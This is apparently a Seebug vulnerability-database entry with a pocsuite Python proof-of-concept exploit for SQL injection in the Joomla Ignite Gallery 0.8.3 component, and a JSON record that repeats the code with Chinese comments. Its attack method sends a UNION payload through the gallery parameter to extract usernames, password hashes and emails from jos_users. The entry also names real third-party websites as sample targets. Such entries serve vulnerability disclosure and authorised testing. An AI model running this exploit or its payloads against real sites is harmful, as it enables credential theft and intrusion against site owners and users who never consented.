ID SSV:65822
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00
Description
No description provided by source.
#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re
class TestPOC(POCBase):
    """pocsuite PoC for SSV-65822: SQL injection in Joomla's Ignite Gallery component.

    The injection point is the ``gallery`` parameter of the component's
    ``view`` task (see ``_query_gallery``).  ``_verify`` sends a UNION-based
    probe and looks for a known marker in the response; ``_attack`` uses the
    same injection point to pull one row (username, password, email columns)
    from ``jos_users``.  Both return a pocsuite ``Output`` built by
    ``parse_output``.

    NOTE(review): both methods test a ``str`` against ``resp.content``, which
    presumes a text body (Python 2 style); on Python 3 ``requests`` objects
    ``.content`` is ``bytes`` -- confirm against the pocsuite version in use.
    """
    vulID = '65822'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2009-02-19'
    createDate = '2016-01-20'
    updateDate = '2016-01-20'
    references = ['http://www.sebug.net/vuldb/ssvid-65822']
    name = 'Joomla Component Ignite Gallery 0.8.3 - SQL Injection Vulnerability'
    appPowerLink = 'http://www.joomla.org'
    appName = 'Joomla Component Ignite Gallery'
    appVersion = '0.8.3'
    vulType = 'SQL Injection'
    desc = '''
Ignite Gallery (com_ignitegallery)组件0.8.0版本至0.8.3版本中存在SQL注入漏洞,
远程攻击者可以借助对index.php的一个图像操作中的gallery参数,执行任意SQL指令。
'''
    samples = ['http://www.crnm.org','http://www.bike-and-run.com']

    def _query_gallery(self, payload):
        """Send *payload* through the vulnerable ``gallery`` parameter.

        Returns ``(target, resp)``: ``target`` is the component URL without the
        payload (what ``_verify`` reports back), ``resp`` the object returned
        by ``req.get``.  The payload is appended to the URL as-is; whether
        ``req.get`` URL-encodes it is not visible here.
        """
        target = self.url + '/index.php?option=com_ignitegallery&task=view&gallery='
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Connection': 'keep-alive',
        }
        return target, req.get(url=target + payload, headers=headers, timeout=50)

    def _attack(self):
        """Exploit the injection to read one row of the Joomla users table.

        Returns an ``Output`` marked successful with an ``AdminInfo`` entry
        (``Username`` / ``Password`` / ``Email``) when the delimited row is
        found in the response body, otherwise a failed ``Output``.
        """
        # The 0x247e7e7e24 / 0x2a2a2a literals are the '$~~~$' and '***'
        # delimiters that the regex below keys on.
        payload = ("-1 union select 1,2,concat(0x247e7e7e24,username,0x2a2a2a,"
                   "password,0x2a2a2a,email,0x247e7e7e24),4,5,6,7,8,9,10 from jos_users limit 0,1--")
        _, resp = self._query_gallery(payload)
        body = resp.content
        found = {}
        # Cheap substring check before running the regex.
        if '$~~~$' in body:
            hit = re.search(r'\$~~~\$(.*)\*\*\*(.*)\*\*\*(.*)\$~~~\$', body, re.M | re.I)
            if hit:
                username, password, email = hit.groups()
                found['AdminInfo'] = {
                    'Username': username,
                    'Password': password,
                    'Email': email,
                }
        return self.parse_output(found)

    def _verify(self):
        """Check the injection point without reading application data.

        Sends a UNION payload that makes the database evaluate ``md5(3.1415)``
        and looks for the expected digest in the response; on a hit the result
        records the target URL and the payload used.
        """
        payload = "-1 union select 1,2,md5(3.1415),4,5,6,7,8,9,10--"
        target, resp = self._query_gallery(payload)
        found = {}
        # md5(3.1415) = 63e1f04640e83605c1d177544a5a0488 (value as given by the PoC author)
        if '63e1f04640e83605c1d177544a5a0488' in resp.content:
            found['VerifyInfo'] = {'URL': target, 'Payload': payload}
        return self.parse_output(found)

    def parse_output(self, result):
        """Wrap *result* in a pocsuite ``Output``: success when non-empty, fail otherwise."""
        output = Output(self)
        if not result:
            output.fail('Internet nothing returned')
        else:
            output.success(result)
        return output
register(TestPOC)  # hand the PoC class to pocsuite's register() (imported above); what it does with it is not visible here
{"href": "https://www.seebug.org/vuldb/ssvid-65822", "status": "cve,poc", "history": [], "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Joomla Component Ignite Gallery 0.8.3 - SQL Injection Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-65822", "cvelist": [], "description": "No description provided by source.", "viewCount": 4, "published": "2014-07-01T00:00:00", "sourceData": "\n #!/usr/bin/env python\r\n# coding: utf-8\r\nfrom pocsuite.net import req\r\nfrom pocsuite.poc import POCBase, Output\r\nfrom pocsuite.utils import register\r\nimport re\r\n\r\nclass TestPOC(POCBase):\r\n vulID = '65822' # ssvid\r\n version = '1.0'\r\n author = ['kikay']\r\n vulDate = '2009-02-19'\r\n createDate = '2016-01-20'\r\n updateDate = '2016-01-20'\r\n references = ['http://www.sebug.net/vuldb/ssvid-65822']\r\n name = 'Joomla Component Ignite Gallery 0.8.3 - SQL Injection Vulnerability'\r\n appPowerLink = 'http://www.joomla.org'\r\n appName = 'Joomla Component Ignite Gallery'\r\n appVersion = '0.8.3'\r\n vulType = 'SQL Injection'\r\n desc = '''\r\n Ignite Gallery (com_ignitegallery)\u7ec4\u4ef60.8.0\u7248\u672c\u81f30.8.3\u7248\u672c\u4e2d\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e\uff0c\r\n \u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u501f\u52a9\u5bf9index.php\u7684\u4e00\u4e2a\u56fe\u50cf\u64cd\u4f5c\u4e2d\u7684gallery\u53c2\u6570\uff0c\u6267\u884c\u4efb\u610fSQL\u6307\u4ee4\u3002\r\n '''\r\n samples = ['http://www.crnm.org','http://www.bike-and-run.com']\r\n\r\n def _attack(self):\r\n #\u5229\u7528SQL\u6ce8\u5165\u8bfb\u53d6joomla\u7ba1\u7406\u5458\u4fe1\u606f\r\n result = {}\r\n #\u8bbf\u95ee\u7684\u5730\u5740\r\n exploit='/index.php?option=com_ignitegallery&task=view&gallery='\r\n #\u5229\u7528Union\u65b9\u5f0f\u8bfb\u53d6\u4fe1\u606f\r\n payload=\"-1 union select 1,2,concat(0x247e7e7e24,username,0x2a2a2a,\"\\\r\n \"password,0x2a2a2a,email,0x247e7e7e24),4,5,6,7,8,9,10 from jos_users limit 
0,1--\"\r\n #\u6784\u9020\u6f0f\u6d1e\u5229\u7528\u8fde\u63a5\r\n vulurl=self.url+exploit+payload\r\n #\u81ea\u5b9a\u4e49\u7684HTTP\u5934\r\n httphead = {\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',\r\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Connection':'keep-alive'\r\n }\r\n #\u63d0\u53d6\u4fe1\u606f\u7684\u6b63\u5219\u8868\u8fbe\u5f0f\r\n parttern='\\$~~~\\$(.*)\\*\\*\\*(.*)\\*\\*\\*(.*)\\$~~~\\$'\r\n #\u53d1\u9001\u8bf7\u6c42\r\n resp=req.get(url=vulurl,headers=httphead,timeout=50)\r\n #\u68c0\u67e5\u662f\u5426\u542b\u6709\u7279\u5f81\u5b57\u7b26\u4e32\r\n if '$~~~$' in resp.content:\r\n #\u63d0\u53d6\u4fe1\u606f\r\n match=re.search(parttern,resp.content,re.M|re.I)\r\n if match:\r\n #\u6f0f\u6d1e\u5229\u7528\u6210\u529f\r\n result['AdminInfo']={}\r\n #\u7528\u6237\u540d\r\n result['AdminInfo']['Username']=match.group(1)\r\n #\u5bc6\u7801\r\n result['AdminInfo']['Password']=match.group(2)\r\n #\u90ae\u7bb1\r\n result['AdminInfo']['Email']=match.group(3)\r\n return self.parse_output(result)\r\n\r\n def _verify(self):\r\n #\u901a\u8fc7\u8ba1\u7b97md5(3.1415)\u7684\u503c\uff0c\u6765\u9a8c\u8bc1SQL\u6ce8\u5165\r\n result = {}\r\n #\u8bbf\u95ee\u7684\u5730\u5740\r\n exploit='/index.php?option=com_ignitegallery&task=view&gallery='\r\n #\u5229\u7528union\u7684\u65b9\u5f0f\uff08\u8ba1\u7b97md5(3.1415)\uff09\r\n payload=\"-1 union select 1,2,md5(3.1415),4,5,6,7,8,9,10--\"\r\n #\u6784\u9020\u6f0f\u6d1e\u5229\u7528\u8fde\u63a5\r\n vulurl=self.url+exploit+payload\r\n #\u81ea\u5b9a\u4e49\u7684HTTP\u5934\r\n httphead = {\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',\r\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Connection':'keep-alive'\r\n }\r\n #\u53d1\u9001\u8bf7\u6c42\r\n resp=req.get(url=vulurl,headers=httphead,timeout=50)\r\n 
#\u68c0\u67e5\u662f\u5426\u542b\u6709\u7279\u5f81\u5b57\u7b26\u4e32(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)\r\n if '63e1f04640e83605c1d177544a5a0488' in resp.content:\r\n #\u6f0f\u6d1e\u9a8c\u8bc1\u6210\u529f\r\n result['VerifyInfo']={}\r\n result['VerifyInfo']['URL'] = self.url+exploit\r\n result['VerifyInfo']['Payload'] = payload\r\n return self.parse_output(result)\r\n\r\n def parse_output(self, result):\r\n #parse output\r\n output = Output(self)\r\n if result:\r\n output.success(result)\r\n else:\r\n output.fail('Internet nothing returned')\r\n return output\r\n\r\n\r\nregister(TestPOC)\n ", "id": "SSV:65822", "enchantments_done": [], "_object_type": "robots.models.seebug.SeebugBulletin", "type": "seebug", "lastseen": "2017-11-19T13:45:54", "reporter": "Root", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2017-11-19T13:45:54"}, "dependencies": {"references": [], "modified": "2017-11-19T13:45:54"}, "vulnersScore": 0.4}, "objectVersion": "1.4", "references": []}
{}